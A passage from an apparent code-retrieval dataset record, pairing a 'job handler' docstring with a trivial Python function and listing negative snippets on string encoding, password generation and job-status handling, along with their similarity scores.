\"+str(self._l[1])+\" \"+str(self._l[2])+\" \"+str(self._l[3])", "def encode(num):\n encode = ''\n \n if (num < 0):\n return ''\n \n while (num >= base_count): \n mod = num % base_count\n encode = alphabet[mod] + encode\n num = num // base_count\n \n if (num):\n encode = alphabet[num] + encode\n \n return encode", "def base_alphabet(cls, value):\n assert type(value) is str\n key_length = len(value)\n return sum(\n cls.RANGE ** (key_length - (x + 1)) * ord(value[x])\n for x in range(key_length)\n )", "def init_letters():\n return ('a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i',\n 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r',\n 's', 't', 'u', 'v', 'w', 'x', 'y', 'z',\n 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I',\n 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R',\n 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z')", "def to_morze(text: str) -> str:\n\n\tmorze = {\"A\":\".-\",\"B\":\"-...\",\"C\":\"-.-.\",\"D\":\"-..\",\"E\":\".\",\"F\":\"..-.\",\n\t\"G\":\"--.\",\"H\":\"....\",\"I\":\"..\",\"J\":\"-.-.\",\"K\":\"-.-\",\"L\":\".-..\",\"M\":\"--\",\n\t\"N\":\"-.\",\"O\":\"---\",\"P\":\".--.\",\"Q\":\"--.-\",\"R\":\".-.\",\"S\":\"...\",\"T\":\"-\",\n\t\"U\":\"..-\",\"V\":\"...-\",\"W\":\".--\",\"X\":\".-..\",\"Y\":\"-.--\",\"Z\":\"--..\"}\n\n\ttextMorze = ''.join([morze.get(c.upper(), ' ') for c in text])\n\n\treturn textMorze", "def _abc(i):\n if i < 26:\n return ABC_STRING[i]\n else:\n return _abc(i - 26) + ABC_STRING[i % 26] # sexy sexy recursion", "def fill_in(formula):\n letters = \"\".join(set(\"\".join(re.findall(\"[A-Z]+\", formula))))\n # print(letters)\n for digits in itertools.permutations('1234567890', len(letters)):\n table = str.maketrans(letters, ''.join(digits))\n yield formula.translate(table)", "def generate_password():\n numbers = ['0', '1', '2', '3', '4', '5'] \n chars = [\"A\", \"B\", \"C\", \"D\", \"E\"]\n temp_passs = \"\"\n temp_pass = \"\"\n\n for i in range(4):\n rand_num = random.choice(numbers)\n temp_pass += temp_pass.join(rand_num)\n # rand_chars = random.choice(chars)\n for i in range(4):\n rand_chars = random.choice(chars)\n temp_passs += temp_passs.join(rand_chars)\n return(temp_pass + \"-\" + temp_passs)", "def ord(s):\n pass", "def create_random_code(chars=AVAIABLE_CHARS):\n return \"\".join(\n [choice(chars) for _ in range(SIZE)]\n )", "def get_complement(nucleotide): # This one works\n nuc = list(nucleotide)\n count = 0\n complement = ''\n for element in nuc:\n if element == 'A':\n nuc[count] = 'T'\n elif element == 'T':\n nuc[count] = 'A'\n elif element == 'C':\n nuc[count] = 'G'\n elif element == 'G':\n nuc[count] = 'C'\n complement = complement + nuc[count]\n count = count + 1\n return complement", "def giveReadablePassword():\n import random\n words = [\n 'Alpha',\n 'Bravo',\n 'Charlie',\n 'Delta',\n 'Echo',\n 'Foxtrot',\n 'Golf',\n 'Hotel',\n 'India',\n 'Juliet',\n 'Kilo',\n 'Lima',\n 'Mike',\n 'November',\n 'Oscar',\n 'Papa',\n 'Quebec',\n 'Romeo',\n 'Sierra',\n 'Tango',\n 'Uniform',\n 'Victor',\n 'Whiskey',\n 'Xray',\n 'Yankee',\n 'Zulu']\n\n chars = [\n '!',\n '#',\n '$',\n '%',\n '&',\n '*',\n '-',\n '.',\n ':',\n '?',\n '@' \n ]\n\n\n random.seed()\n pw = ''\n pw += random.choice(words)\n pw += random.choice(words)\n pw += random.choice(chars)\n pw += \"{:04d}\".format(random.randint(0,10000))\n return pw", "def render_to_numeral_system(n: int, alphabet: str) -> str:\n assert n >= 0\n assert len(alphabet) == len(set(alphabet))\n if n == 0:\n return alphabet[0]\n b = len(alphabet)\n reverse_digits = []\n while n > 0:\n reverse_digits.append(alphabet[n % b])\n n = n // b\n return \"\".join(reversed(reverse_digits))", "def generate_password(self, length):\n items = [\"a\", \"e\", \"i\", \"o\", \"u\", \"1\", \"2\", \"4\", \"5\", \"7\", \"8\", \"9\"]\n\n new_password = \"\"\n while(len(new_password) < length):\n item = items[randint(0, len(items) - 1)]\n new_password += item\n return new_password", "def create_word(char_list):", "def rand_string():\n out = ''\n for _ in range(24):\n out += choice(ascii_letters)\n return out", "def random_alpha_num_word(length):\n return ''.join([random_alpha_num_char() for _ in range(0, length)])", "def letter_for(label):\n return \"ABCDEFGHIJ\"[label]", "def change(st):\n return ''.join('1' if a in st.lower() else '0' for a in map(chr, range(97, 123)))", "def carte_to_string(carte):\r\n symboles = [str(i+1) for i in range(10)] + [\"V\", \"D\", \"R\"]\r\n couleurs = [\"♥\", \"♦\", \"♣\", \"♠\"]\r\n res = symboles[carte[0] - 1] + couleurs[carte[1] - 1]\r\n return res", "def transforme(n):\n if n<10 :\n return '0'+str(n)\n else :\n return str(n)" ]
[ "0.6781998", "0.64925814", "0.6049585", "0.5974472", "0.5921979", "0.58175975", "0.58117867", "0.58117867", "0.5776275", "0.5770409", "0.57647777", "0.57624525", "0.5754226", "0.57396114", "0.573307", "0.5721849", "0.5701658", "0.5699352", "0.5680936", "0.56807214", "0.56601375", "0.5654664", "0.56449497", "0.56413025", "0.5621481", "0.56064427", "0.5592871", "0.55834574", "0.5575394", "0.5565895", "0.55526334", "0.55451137", "0.5542032", "0.55213505", "0.5514988", "0.5510811", "0.55014735", "0.54948497", "0.5485197", "0.5484041", "0.5480018", "0.54783636", "0.54782367", "0.54757947", "0.54672956", "0.54640216", "0.5463717", "0.54594004", "0.54582214", "0.5446594", "0.5443737", "0.5440429", "0.54038024", "0.53986114", "0.53944904", "0.5393995", "0.5382405", "0.53629166", "0.53617823", "0.53609866", "0.53604746", "0.5355241", "0.53541553", "0.53378844", "0.5337163", "0.5329411", "0.5312533", "0.5306369", "0.5286218", "0.52824175", "0.5279591", "0.52739227", "0.526845", "0.526749", "0.52550197", "0.52521235", "0.5247073", "0.52344525", "0.523056", "0.5227793", "0.52208984", "0.52205104", "0.52199316", "0.52190846", "0.52189463", "0.5216344", "0.5215233", "0.52145034", "0.5214136", "0.5212768", "0.52116984", "0.5210096", "0.5199035", "0.51977193", "0.5197358", "0.5192259", "0.51844007", "0.51823676", "0.51706046", "0.51703215", "0.5168918" ]
0.0
-1
Job handler. Returns True on success, False on failure or raise exception. Depending on result, on_success, on_failure or on_exception
def handler(self, *args, **kwargs): return True
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _handle_success(self, result_ttl: int, pipeline: 'Pipeline'):\n # self.log.debug('Setting job %s status to finished', job.id)\n self.set_status(JobStatus.FINISHED, pipeline=pipeline)\n # Result should be saved in job hash only if server\n # doesn't support Redis streams\n include_result = not self.supports_redis_streams\n # Don't clobber user's meta dictionary!\n self.save(pipeline=pipeline, include_meta=False, include_result=include_result)\n # Result creation should eventually be moved to job.save() after support\n # for Redis < 5.0 is dropped. job.save(include_result=...) is used to test\n # for backward compatibility\n if self.supports_redis_streams:\n from .results import Result\n\n Result.create(self, Result.Type.SUCCESSFUL, return_value=self._result, ttl=result_ttl, pipeline=pipeline)\n\n if result_ttl != 0:\n finished_job_registry = self.finished_job_registry\n finished_job_registry.add(self, result_ttl, pipeline)", "def handle_job_success(self, job):\n super().handle_job_success(job)\n\n self._handle_job_status(job, \"finished\")", "def _handle_task_succeeded(self):\n if self.on_success:\n return self.on_success(self)\n else:\n return HandlerResult.cont()", "def check_job_status(job):\n assert isinstance(job, PreprocessJob),\\\n 'job must be a PreprocessJob'\n\n if job.is_finished():\n return True\n\n return True\n \"\"\"\n ye_task = AsyncResult(job.task_id,\n app=preprocess_csv_file)\n\n if ye_task.state == 'SUCCESS':\n\n if ye_task.result['success']:\n\n preprocess_data = ContentFile(json.dumps(ye_task.result['data']))\n\n new_name = 'preprocess_%s.json' % get_alphanumeric_lowercase(8)\n job.metadata_file.save(new_name,\n preprocess_data)\n job.set_state_success()\n\n job.user_message = 'Task completed! Preprocess is available'\n job.save()\n\n else:\n # Didn't work so well\n job.set_state_failure(ye_task.result['message'])\n job.save()\n\n ye_task.forget()\n return True\n\n elif ye_task.state == STATE_FAILURE:\n job.set_state_failure('ye_task failed....')\n job.save()\n ye_task.forget()\n return True\n\n return False\n \"\"\"", "def _handle_result(self, result):\n if self.result_callback != None:\n #Call the result callback but expect failure.\n try:\n self.result_callback(result, self.rpcclient)\n except Exception as ex:\n self.log.failure(\"Error in result handler for '{cmd!r}'.\",cmd=self.command)\n else:\n #If no handler is set, all we do is log.\n self.logg.error(\"Error: no on_result defined for '{cmd!r}' command result: {res!r}.\",cmd=self.command,res=result)", "def _check_for_finished_job(self):\n raise NotImplementedError", "def some_job():\r\n\tfor row in rows:\r\n\t\treceipt_number = row[0]\r\n\t\tphone_number = row[2]\r\n\t\treturn case_status_check(receipt_number, phone_number)", "def execute(self, job):\n raise NotImplementedError", "def test_java_job_result(self):\n test_app = self._create_app()\n class_path = \"spark.jobserver.JavaHelloWorldJob\"\n job = self._create_job(test_app, class_path,\n ctx=self._get_functional_java_context())\n time.sleep(3)\n self._wait_till_job_is_done(job)\n job = self.client.jobs.get(job.jobId)\n self.assertEqual(\"FINISHED\", job.status)\n self.assertEqual(\"Hi!\", job.result)", "def my_job_func(*, mustfail):\n\n if mustfail:\n raise RuntimeError('Job failed, as requested!')\n\n return {\n 'message': 'Job well done!',\n 'payload': {'coolstuff': 'here'},\n 'readiness': 1.0\n }", "def jobSuccess(self, jobReport):\n\n\n\n jobName = None\n try:\n\n #// Invoke job report handler with jobReport location and flag to enable/disable merge job report handling\n\n handler = ReportHandler(jobReport, int(self.args['MaxInputAccessFailures']), enableMergeHandling=self.enabled)\n jobName = handler()\n logging.info('this is jobname'+ str(jobName))\n except Exception, ex:\n msg = \"Failed to handle job report from job:\\n\"\n msg += \"%s\\n\" % jobReport\n msg += str(ex)\n msg += \"\\n\"\n msg += traceback.format_exc()\n logging.error(msg)\n\n #// Failed to read job report\n if jobName is None:\n return\n\n # files can be cleaned up now\n logging.info(\"trigger cleanup for: %s\" % jobName)\n\n try:\n self.trigger.setFlag(\"cleanup\", jobName, \"MergeAccountant\")\n except (ProdAgentException, ProdException):\n logging.error(\"trying to continue processing success event\")\n\n\n\n\n return #// END jobSuccess", "def _doWork(self) -> bool:\n # grab a job from queur\n self.lock.acquire ()\n jobId = self.nextJob\n self.nextJob = jobId + 1\n self.lock.release ()\n\n # abort if no jobs are left\n if jobId >= len (self.jobs):\n return False\n\n # execute job\n job = self.jobs[jobId]\n lc = job[\"description\"]\n if self.progressCallback != None:\n self.lock.acquire ()\n self.progressCallback (lc, self.executedJobs, len (self.jobs))\n self.lock.release ()\n else:\n print (lc + \" (\" + str (jobId) + \" / \" + str (len (self.jobs)) + \")\\n\")\n if job[\"runner\"] (job) == False:\n return False\n self.executedJobs = self.executedJobs + 1\n\n # continue on jobs\n return True", "def store(self, job, result):\n pass", "def run_job(job, interrupt_if_necessary):", "def test_jobs_are_updated_on_audit_success(self, mock_run_audit):\n fake_job_pk = 1\n\n # Call the task\n process_job(fake_job_pk) # magic number\n\n # Check if update_job was called with a success indicator\n self.mock_update_job.assert_called_once_with(\n fake_job_pk,\n success=True,\n report_path=mock_run_audit.return_value\n )", "def _job_was_successful(self, status):\n success = True\n\n # https://cloud.google.com/life-sciences/docs/reference/rest/v2beta/Event\n for event in status[\"metadata\"][\"events\"]:\n\n logger.debug(event[\"description\"])\n\n # Does it always result in fail for other failure reasons?\n if \"failed\" in event:\n success = False\n action = event.get(\"failed\")\n logger.debug(\"{}: {}\".format(action[\"code\"], action[\"cause\"]))\n\n elif \"unexpectedExitStatus\" in event:\n action = event.get(\"unexpectedExitStatus\")\n\n if action[\"exitStatus\"] != 0:\n success = False\n\n # Provide reason for the failure (desc includes exit code)\n msg = \"%s\" % event[\"description\"]\n if \"stderr\" in action:\n msg += \": %s\" % action[\"stderr\"]\n logger.debug(msg)\n\n return success", "def success(self, result):\r\n raise NotImplementedError", "def codepipeline_success(job_id):\n try:\n codepipeline = boto3.client('codepipeline')\n codepipeline.put_job_success_result(jobId=job_id)\n LOGGER.info('===SUCCESS===')\n return True\n except ClientError as err:\n LOGGER.error(\"Failed to PutJobSuccessResult for CodePipeline!\\n%s\", err)\n return False", "def result_success(result):\n\n if 200 <= result < 300:\n return True\n\n return False", "def handle_completed_job(job, job_set, event_list):\n if not job.postvalidate():\n event_list = push_event(\n event_list,\n '{} completed but doesnt have expected output'.format(job.get_type()))\n job.status = JobStatus.FAILED\n\n if job.get_type() == 'coupled_diagnostic':\n img_dir = 'coupled_diagnostics_{casename}-obs'.format(\n casename=job.config.get('test_casename'))\n img_src = os.path.join(\n job.config.get('coupled_project_dir'),\n img_dir)\n setup_local_hosting(job, event_list, img_src)\n elif job.get_type() == 'amwg_diagnostic':\n img_dir = 'year_set_{year}{casename}-obs'.format(\n year=job.config.get('year_set'),\n casename=job.config.get('test_casename'))\n img_src = os.path.join(\n job.config.get('test_path_diag'),\n '..',\n img_dir)\n setup_local_hosting(job, event_list, img_src)\n elif job.get_type() == 'uvcmetrics':\n img_src = os.path.join(job.config.get('--outputdir'), 'amwg')\n setup_local_hosting(job, event_list, img_src)\n job_set_done = True\n for job in job_set.jobs:\n if job.status != JobStatus.COMPLETED:\n job_set_done = False\n break\n if job.status == JobStatus.FAILED:\n job_set.status = SetStatus.FAILED\n return\n if job_set_done:\n job_set.status = SetStatus.COMPLETED", "def test_execute_monitor_job_success():\n response_queue = queue.Queue()\n message = FakeMessage()\n message.raw_payload = json.dumps(TestData.JOB_MONITOR_PAYLOAD)\n headers = {\"Content-Type\": \"application/json\"}\n\n with aioresponses() as mocked:\n mocked.get(\n TestData.JOB_MONITOR_URL,\n status=200,\n body=json.dumps(TestData.JOB_1_RUNNING),\n headers=headers,\n )\n mocked.get(\n TestData.JOB_MONITOR_URL,\n status=200,\n body=json.dumps(TestData.JOB_1_SUCCESSFUL),\n headers=headers,\n )\n worker.execute(message, TestData.RECEPTOR_CONFIG, response_queue)\n\n response = response_queue.get()\n assert (response[\"status\"]) == 200\n json_response = json.loads(response[\"body\"])\n assert (json_response[\"status\"]) == \"successful\"\n assert len(json_response[\"artifacts\"].keys()) > 0\n for key in json_response[\"artifacts\"].keys():\n assert key.startswith(TestData.ARTIFACTS_KEY_PREFIX)", "def _launch_job(self, job):\n details = self.sm.get_job_details(job.jobId)\n handler = self.handlers[details[0]['method']]\n type = details[0]['type']\n resultId = details[0]['resultid']\n job.set_phase('EXECUTING')\n job.set_start_time(datetime.utcnow().isoformat())\n job.add_result(resultId, 'http://localhost:8000/%s/%s/results/details' % (type, job.jobId))\n self.sm.update_job(job = job)\n self.threads.append(Future(handler, job.jobId, job))", "def test_successful_job(self, _is_coalesced):\n successful_job = json.loads(BASE_JSON % (SUCCESS, 1433166610, 1, 1433166609))[0]\n self.assertEquals(self.query_api.get_job_status(successful_job), SUCCESS)", "def on_success(self, queue, result):\n if not result:\n # no hook, we need to go on the \"check-events\" mode\n CheckRepositoryEvents.add_job(self.identifier.hget())\n else:\n # we have a hook, stop checking events\n for j in CheckRepositoryEvents.collection(\n queued=1, identifier=self.identifier.hget()).instances():\n j.status.hset(STATUSES.CANCELED)\n\n self.clone(delayed_for=60 * 13 + randint(0, 60 * 4))", "def after_return(self, status, retval, task_id, args, kwargs, einfo):\n self.job_db.update_job_state(self.job_id, status.lower())\n if status == 'FAILURE':\n error_object = { 'job_id': self.job_id, 'job_name': self.name, 'message': self.error }\n self.job_db.add_job_error( self.job_id, error_object )\n\n if self.parent_job_id is not None:\n self._propagate_failure_to_ancestors(self.parent_job_id, error_object)\n self.job_db.close()", "def _call(self, job):\n try:\n job.func(self.manager)\n except KeyboardInterrupt:\n # Do not block on KeyboardInterrupt\n raise\n except Exception as error: # TODO: Be specific\n LOGGER.error('Error while processing job: %s', error)\n self.manager.on_job_error(self, job, error)", "def received_job_from_worker(self, arguments, result, worker_name):\n # Find the correct job.\n job = [_i for _i in self._workers[worker_name].active_jobs\n if _i.arguments == arguments]\n if len(job) == 0:\n msg = (\"MASTER: Job %s from worker %i not found. All jobs: %s\\n\" %\n (str(arguments), worker_name,\n str(self._workers[worker_name].active_jobs)))\n raise ValueError(msg)\n if len(job) > 1:\n raise ValueError(\"WTF %i %s %s\" % (\n worker_name, str(arguments),\n str(self._workers[worker_name].active_jobs)))\n job = job[0]\n job.result = result\n\n self._workers[worker_name].active_jobs.remove(job)\n self._workers[worker_name].completed_jobs_count[0] += 1\n self._finished_jobs.append(job)", "def _process_results(self, *args, **kwargs): # noqa: E501\n # Lock before processing results to prevent conflicts\n if not self._acquire_pr_lock():\n return\n\n # Get the future instance\n future = self.future\n\n # Skip if no Future\n if not future:\n return\n\n # Skip processing results if forget\n if self.forget:\n # Clean up client\n self.client.close()\n return\n\n try:\n # Get results using the client\n result = self.client.gather(future)\n except Exception as e:\n # Tell scheduler to stop sending updates about this key\n self.client.set_metadata(self.key, False)\n # Clean up client\n self.client.close()\n result = e\n log.warning(\n 'Exception encountered when retrieving results: \"{}\"'.format(str(e))\n )\n\n # Tell scheduler to stop sending updates about this key\n self.client.set_metadata(self.key, False)\n\n # Handle custom process results function\n if self.process_results_function:\n # Get the process_results_function in TethysJob and call it with the result retrived\n try:\n result = self.process_results_function(result)\n except Exception as e:\n log.exception(\"Process Results Function Error\")\n self._status = \"ERR\"\n result = str(e)\n\n # Serialize the result\n try:\n self.result = result\n except Exception:\n log.exception(\"Results Serialization Error\")\n self._status = \"ERR\"\n else:\n self._status = \"COM\" if self._status != \"ERR\" else \"ERR\"\n\n # Erase the key to avoid problem with dask recycle key\n self.key = \"\"\n\n # save the results or status in the database\n self.save()\n\n # Clean up client\n self.client.close()\n\n if client_fire_forget:\n client_fire_forget.close()\n\n self._release_pr_lock()", "def test_successful_job(self):\n\n successful_job = json.loads(TREEHERDER_JOB % (\"success\", \"completed\"))\n self.assertEquals(self.query_api.get_job_status(successful_job), SUCCESS)", "def returner(ret):\n job_fun = ret['fun']\n job_fun_escaped = job_fun.replace('.', '_')\n job_id = ret['jid']\n job_minion_id = ret['id']\n job_success = True if ret['return'] else False\n job_retcode = ret.get('retcode', 1)\n index = 'salt-{0}'.format(job_fun_escaped)\n #index = 'salt-{0}-{1}'.format(job_fun_escaped, datetime.date.today().strftime('%Y.%m.%d')) #TODO prefer this? #TODO make it configurable!\n\n functions_blacklist = ['saltutil.find_job', 'pillar_items', 'grains_items']\n functions_whitelist = ['test.ping'] # TODO\n\n # Determine doc type, set a hardcoded default at the moment # TODO\n #doc_type = datetime.date.today().strftime('%Y%m%d%H%M%S%f')\n doc_type_version = '2014_7_a' # TODO config option\n\n if job_fun in functions_blacklist and job_fun not in functions_whitelist: #TODO configurable\n log.debug(\n 'Won\\'t push new data to Elasticsearch, job with jid={0} and function={1} which is in the user-defined list of ignored functions'.format(\n job_id, job_fun))\n return\n\n if not job_success: # TODO actually, what is retcode? or job_retcode != 0:\n log.debug('Won\\'t push new data to Elasticsearch, job with jid={0}, job_retcode={1} was not succesful'.format(job_id, job_retcode))\n return\n\n index_exists = __salt__['elasticsearcharbe.index_exists'](index)\n\n if not index_exists:\n # TODO make settings configurable\n index_definition = {'settings': {'number_of_shards': 1, 'number_of_replicas': 0}}\n __salt__['elasticsearcharbe.index_create']('{0}-v1'.format(index), index_definition)\n __salt__['elasticsearcharbe.alias_create']('{0}-v1'.format(index), index)\n #log.warn('Won\\'t push new data to Elasticsearch, index \\'{0}\\' does\\'t exist! You need to create it yourself!'.format(index))\n #return\n\n class UTC(tzinfo):\n def utcoffset(self, dt):\n return timedelta(0)\n\n def tzname(self, dt):\n return 'UTC'\n\n def dst(self, dt):\n return timedelta(0)\n\n utc = UTC()\n\n data = {\n '@timestamp': datetime.now(utc).isoformat(),\n 'success': job_success,\n 'retcode': job_retcode,\n 'minion': job_minion_id, #TODO minion_id\n 'fun': job_fun,\n 'jid': job_id,\n 'data': ret['return'],\n }\n body = json.dumps(data)\n\n ret = __salt__['elasticsearcharbe.document_create'](index=index, doc_type=doc_type_version, body=body)", "def new_result(self, job, update_model=True):\n\t\tif not job.exception is None:\n\t\t\tself.logger.warning(\"job {} failed with exception\\n{}\".format(job.id, job.exception))", "def result(self, job):\n\n assert isinstance(job, six.string_types)\n\n try:\n response = requests.get('{}/api/v1/result/{}'.format(self.URL, job))\n except (Timeout, ConnectionError):\n raise ServiceError('Service unavailable: timeout.', 4)\n\n result = self._validate(response)\n data = result.get('state')\n state = State.from_dict(data) if data else None\n\n if state is not None:\n self.__previous_job = self.__current_job\n self.__current_job = None\n\n return result.get('status'), state", "def CheckIfJobFinished(jobid, numseq, to_email, g_params): # {{{\n bsname = \"job_final_process\"\n path_result = os.path.join(g_params['path_static'], 'result')\n rstdir = os.path.join(path_result, jobid)\n gen_logfile = g_params['gen_logfile']\n gen_errfile = g_params['gen_errfile']\n name_server = g_params['name_server']\n g_params['jobid'] = jobid\n g_params['numseq'] = numseq\n g_params['to_email'] = to_email\n jsonfile = os.path.join(rstdir, f\"{bsname}.json\")\n myfunc.WriteFile(json.dumps(g_params, sort_keys=True), jsonfile, \"w\")\n binpath_script = os.path.join(g_params['webserver_root'], \"env\", \"bin\")\n\n finished_idx_file = \"%s/finished_seqindex.txt\"%(rstdir)\n failed_idx_file = \"%s/failed_seqindex.txt\"%(rstdir)\n py_scriptfile = os.path.join(binpath_script, f\"{bsname}.py\")\n finished_idx_list = []\n failed_idx_list = []\n if os.path.exists(finished_idx_file):\n finished_idx_list = list(set(myfunc.ReadIDList(finished_idx_file)))\n if os.path.exists(failed_idx_file):\n failed_idx_list = list(set(myfunc.ReadIDList(failed_idx_file)))\n\n lockname = f\"{bsname}.lock\"\n lock_file = os.path.join(g_params['path_result'], g_params['jobid'],\n lockname)\n\n num_processed = len(finished_idx_list)+len(failed_idx_list)\n if num_processed >= numseq: # finished\n if ('THRESHOLD_NUMSEQ_CHECK_IF_JOB_FINISH' in g_params\n and numseq <= g_params['THRESHOLD_NUMSEQ_CHECK_IF_JOB_FINISH']):\n cmd = [\"python\", py_scriptfile, \"-i\", jsonfile]\n (isSubmitSuccess, t_runtime) = webcom.RunCmd(cmd, gen_logfile, gen_errfile)\n elif not os.path.exists(lock_file):\n bash_scriptfile = f\"{rstdir}/{bsname},{name_server},{jobid}.sh\"\n code_str_list = []\n code_str_list.append(\"#!/bin/bash\")\n cmdline = f\"python {py_scriptfile} -i {jsonfile}\"\n code_str_list.append(cmdline)\n code = \"\\n\".join(code_str_list)\n myfunc.WriteFile(code, bash_scriptfile, mode=\"w\", isFlush=True)\n os.chmod(bash_scriptfile, 0o755)\n os.chdir(rstdir)\n cmd = ['sbatch', bash_scriptfile]\n cmdline = \" \".join(cmd)\n verbose = False\n if 'DEBUG' in g_params and g_params['DEBUG']:\n verbose = True\n webcom.loginfo(\"Run cmdline: %s\"%(cmdline), gen_logfile)\n (isSubmitSuccess, t_runtime) = webcom.RunCmd(cmd, gen_logfile, gen_errfile, verbose)\n if 'DEBUG' in g_params and g_params['DEBUG']:\n webcom.loginfo(\"isSubmitSuccess: %s\"%(str(isSubmitSuccess)), gen_logfile)", "def on_background_job(self, event):\n job_cmd = event['Job-Command']\n job_uuid = event['Job-UUID']\n # TEST MIKE\n if job_cmd == 'originate' and job_uuid:\n try:\n status, reason = event.get_body().split(' ', 1)\n except ValueError:\n return\n request_uuid = self.bk_jobs.pop(job_uuid, None)\n if not request_uuid:\n return\n\n # case GroupCall\n if event['variable_plivo_group_call'] == 'true':\n status = status.strip()\n reason = reason.strip()\n if status[:3] != '+OK':\n self.log.info(\"GroupCall Attempt Done for RequestUUID %s (%s)\" \\\n % (request_uuid, reason))\n return\n self.log.warn(\"GroupCall Attempt Failed for RequestUUID %s (%s)\" \\\n % (request_uuid, reason))\n return\n\n # case Call and BulkCall\n try:\n call_req = self.call_requests[request_uuid]\n except KeyError:\n return\n # Handle failure case of originate\n # This case does not raise a on_channel_hangup event.\n # All other failures will be captured by on_channel_hangup\n status = status.strip()\n reason = reason.strip()\n if status[:3] != '+OK':\n # In case ring/early state done, just warn\n # releasing call request will be done in hangup event\n if call_req.state_flag in ('Ringing', 'EarlyMedia'):\n self.log.warn(\"Call Attempt Done (%s) for RequestUUID %s but Failed (%s)\" \\\n % (call_req.state_flag, request_uuid, reason))\n # notify end\n self.log.debug(\"Notify Call success for RequestUUID %s\" % request_uuid)\n call_req.notify_call_end()\n return\n # If no more gateways, release call request\n elif not call_req.gateways:\n self.log.warn(\"Call Failed for RequestUUID %s but No More Gateways (%s)\" \\\n % (request_uuid, reason))\n # notify end\n self.log.debug(\"Notify Call success for RequestUUID %s\" % request_uuid)\n call_req.notify_call_end()\n # set an empty call_uuid\n call_uuid = ''\n hangup_url = call_req.hangup_url\n self.set_hangup_complete(request_uuid, call_uuid,\n reason, event, hangup_url)\n return\n # If there are gateways and call request state_flag is not set\n # try again a call\n elif call_req.gateways:\n self.log.warn(\"Call Failed without Ringing/EarlyMedia for RequestUUID %s - Retrying Now (%s)\" \\\n % (request_uuid, reason))\n # notify try a new call\n self.log.debug(\"Notify Call retry for RequestUUID %s\" % request_uuid)\n call_req.notify_call_try()\n elif job_cmd == 'conference' and job_uuid:\n result = event.get_body().strip() or ''\n async_res = self.conf_sync_jobs.pop(job_uuid, None)\n if async_res is None:\n return\n elif async_res is True:\n self.log.info(\"Conference Api (async) Response for JobUUID %s -- %s\" % (job_uuid, result))\n return\n async_res.set(result)\n self.log.info(\"Conference Api (sync) Response for JobUUID %s -- %s\" % (job_uuid, result))", "def _check_result(self, fut, *data):\n return fut", "def _job_succeeded(k8s_ctx: str, k8s_job_file: pathlib.Path, dry_run: bool = False) -> bool:\n if not k8s_job_file.exists():\n raise FileNotFoundError(str(k8s_job_file))\n\n cmd = f'kubectl --context={k8s_ctx} get -f {k8s_job_file} -o json'\n\n if dry_run:\n logging.info(cmd)\n return True\n\n p = safe_exec(cmd)\n if not p.stdout:\n return False\n\n retval = 0\n if not p.stdout:\n return False\n\n json_output = json.loads(p.stdout.decode())\n if 'status' not in json_output:\n return False\n\n final_status = ''\n if 'conditions' in json_output['status'] and len(json_output['status']['conditions']) > 0:\n final_status = json_output['status']['conditions'][0]['type']\n\n if final_status == 'Complete' and 'succeeded' in json_output['status']:\n retval = json_output['status']['succeeded']\n elif final_status == 'Failed' and 'failed' in json_output['status']:\n n = int(json_output['status']['failed'])\n logging.error(f'Job {k8s_job_file} failed {n} time(s)')\n # EB-1236, EB-1243: This exception is not caught anywhere - either catch it in caller,\n # or throw UserReportError instead\n raise RuntimeError(f'Job {k8s_job_file} failed {n} time(s)')\n return int(retval) == 1", "def check_result(f):\n\n def g(self, *args, **kwargs):\n\n if self._results is None:\n raise exceptions.Error(\"Called before `execute`\")\n return f(self, *args, **kwargs)\n\n return g", "def run(self):\n try:\n result = self._exec(*self._args)\n self.job_succeeded.emit(result)\n except Exception as e:\n self.job_failed.emit(e, self._args)", "def test_successful(self):\n\n url = '/%s/jobs/' % self.api\n response = self.client.generic('GET', url)\n self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)\n\n result = json.loads(response.content)\n self.assertEqual(len(result['results']), 3)\n for entry in result['results']:\n expected = None\n if entry['id'] == self.job1.id:\n expected = self.job1\n elif entry['id'] == self.job2.id:\n expected = self.job2\n elif entry['id'] == self.job3.id:\n expected = self.job3\n else:\n self.fail('Found unexpected result: %s' % entry['id'])\n self.assertEqual(entry['job_type']['name'], expected.job_type.name)\n self.assertEqual(entry['job_type_rev']['job_type']['id'], expected.job_type.id)\n self.assertEqual(entry['is_superseded'], expected.is_superseded)", "def _retrieve_result(self, out):\n try:\n result = self.parallel._backend.retrieve_result_callback(out)\n outcome = dict(status=TASK_DONE, result=result)\n except BaseException as e:\n # Avoid keeping references to parallel in the error.\n e.__traceback__ = None\n outcome = dict(result=e, status=TASK_ERROR)\n\n self._register_outcome(outcome)\n return outcome['status'] != TASK_ERROR", "async def my_job_async(mustfail):\n if mustfail:\n raise RuntimeError('Job failed, as requested!')\n\n return {\n 'message': 'job well done',\n 'payload': {'coolstuff': 'here'},\n 'readiness': 1.0\n }", "def handle_event(*, event, backend, retries=0): # noqa: C901\n Backend = import_string(backend) # noqa: N806\n\n try:\n job_app_label, job_model_name, job_pk = Backend.get_job_params(\n event=event\n )\n except EventError:\n logger.warning(\"Event not handled by backend\")\n return\n\n job = get_model_instance(\n pk=job_pk, app_label=job_app_label, model_name=job_model_name\n )\n executor = job.get_executor(backend=backend)\n\n if job.status != job.EXECUTING:\n executor.deprovision()\n raise PriorStepFailed(\"Job is not executing\")\n\n try:\n executor.handle_event(event=event)\n except TaskStillExecuting:\n # Nothing to do here, this will be called when it is finished\n return\n except TaskCancelled:\n job.update_status(status=job.CANCELLED)\n return\n except RetryStep:\n try:\n _retry(\n task=handle_event,\n signature_kwargs={\n \"kwargs\": {\"event\": event, \"backend\": backend}\n },\n retries=retries,\n )\n return\n except MaxRetriesExceededError:\n job.update_status(\n status=job.FAILURE,\n stdout=executor.stdout,\n stderr=executor.stderr,\n error_message=\"Time limit exceeded\",\n )\n raise\n except ComponentException as e:\n job.update_status(\n status=job.FAILURE,\n stdout=executor.stdout,\n stderr=executor.stderr,\n error_message=str(e),\n )\n except Exception:\n job.update_status(\n status=job.FAILURE,\n stdout=executor.stdout,\n stderr=executor.stderr,\n error_message=\"An unexpected error occurred\",\n )\n raise\n else:\n job.update_status(\n status=job.EXECUTED,\n stdout=executor.stdout,\n stderr=executor.stderr,\n duration=executor.duration,\n )\n on_commit(\n 